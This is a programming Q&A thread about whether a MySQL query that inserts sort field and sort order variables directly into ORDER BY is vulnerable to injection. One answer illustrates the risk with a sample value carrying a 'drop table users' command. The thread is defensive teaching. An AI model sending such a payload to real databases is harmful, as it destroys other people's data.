mysql - 看这条sql有可能被注入吗
SELECT * FROM table1 where condition1=1 ORDER BY $sortField$ $sortOrder$ limit 0,20$sortField$和$sortOrder$可以写任意sql
这条sql有被注入的风险吗
SELECT * FROM table1 where condition1=1 ORDER BY $sortField$ $sortOrder$ limit 0,20$sortField$和$sortOrder$可以写任意sql
这条sql有被注入的风险吗
ringa_lee2017-04-17 15:06:00
As long as you directly use variables to generate sql statements, there is a risk of being injected
SELECT * FROM table1 where condition1=1 ORDER BY $sortField$ $sortOrder$ limit 0,20sortField="id"
sortOrder="; drop table users; --"
Your sql will become
SELECT * FROM table1 where condition1=1 ORDER BY id; drop table users; -- limit 0,20
天蓬老师2017-04-17 15:06:00
You are thinking about the problem in the wrong direction.
The correct way to prevent injection is to use the parameter mode of the official driver, because only the official version knows how to avoid being injected.
If you write SQL yourself, even if it is not injected now, maybe if one of the components involved in this link changes in the future, there will be a risk of being injected.
